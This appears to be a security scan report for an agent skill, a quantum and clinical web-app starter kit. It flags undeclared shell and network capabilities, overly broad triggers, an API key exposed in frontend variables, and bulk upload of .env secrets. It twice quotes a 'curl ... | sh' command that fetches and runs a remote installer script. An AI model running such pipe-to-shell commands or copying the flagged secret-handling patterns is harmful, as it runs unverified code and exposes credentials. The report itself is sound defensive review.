ClawHub

Hackathon Quantinuum

Security checks across malware telemetry and agentic risk

Overview

This skill appears to be a legitimate quantum app starter kit, but users should review its cloud deployment and secret-handling examples before using it.

Reasonable to install for a hackathon or prototype if you are comfortable reviewing generated code. Before deploying, inspect .env, avoid putting real secrets in VITE_* frontend variables, use --skip-secrets unless you intend to upload secrets to Fly.io, lock down CORS/auth/rate limits, and use only synthetic or de-identified clinical data unless you have a compliance plan.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
Findings (10)

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill describes and directs use of powerful capabilities including shell execution, file read/write, environment access, and network deployment, but does not declare permissions or boundaries. This creates a mismatch between what the skill can induce an agent to do and what reviewers or policy systems can pre-approve, increasing the risk of unintended code execution, secret exposure, or remote deployment.

Intent-Code Divergence

Medium
Confidence
89% confidence
Finding
The generated code hardcodes the backend URL into source files while the README instructs users to use an environment variable. This can cause operators to assume endpoint configuration is externalized when it is actually embedded into shipped client code, increasing the risk of accidentally exposing internal or non-production backend URLs and making secure environment-specific deployment harder.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The description defines the skill for broad categories like clinical, healthcare, and quantum web apps without strong gating conditions or exclusions. An agent may invoke this skill for loosely related requests, leading to unnecessary use of deployment, code-generation, or external-service workflows in sensitive healthcare contexts.

Vague Triggers

Medium
Confidence
95% confidence
Finding
The trigger list includes very generic terms such as clinical, healthcare, drug discovery, and clinical trials, which are likely to appear in ordinary conversation unrelated to this toolchain. Over-broad keyword activation can cause the agent to route benign or sensitive requests into a high-capability skill that performs coding, file operations, networking, or deployment steps unnecessarily.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The guide explicitly recommends deploying with `--skip-health-checks` to work around failures, but does not warn that this can push a broken or misconfigured service into production. In a cloud-hosted backend handling healthcare- or quantum-related workloads, bypassing health validation can lead to outages, bad responses, or exposure of partially initialized services.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The guide shows a pattern for constructing and executing quantum circuits directly from JSON input without validation, authorization, or resource controls. While this is not arbitrary code execution in the traditional sense, it exposes a code-like remote execution surface that can be abused to trigger expensive computation, oversized circuits, invalid qubit access, or backend resource exhaustion—especially in a cloud API context.

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The document instructs users to place `VITE_API_KEY` in a frontend `.env` file and inject it into client-side requests via `import.meta.env`, which exposes the key to any browser user at build/runtime. In a healthcare/clinical quantum app context, this can allow unauthorized API use, quota theft, abuse of paid quantum compute resources, and potentially broader access depending on what the key authorizes.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The script automatically uploads all key/value pairs from a local .env file to Fly.io as secrets without an explicit consent prompt or strong warning that credentials are being transmitted to a remote platform. In a healthcare or clinical deployment context, this increases the risk of unintentionally exporting sensitive API keys, tokens, or regulated environment data to external infrastructure.

External Script Fetching

High
Category
Supply Chain
Content
```bash
# 1. Install flyctl
curl -L https://fly.io/install.sh | sh

# 2. Login
fly auth login
Confidence
98% confidence
Finding
curl -L https://fly.io/install.sh | sh

Chaining Abuse

High
Category
Tool Misuse
Content
```bash
# 1. Install flyctl
curl -L https://fly.io/install.sh | sh

# 2. Login
fly auth login
Confidence
99% confidence
Finding
| sh

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal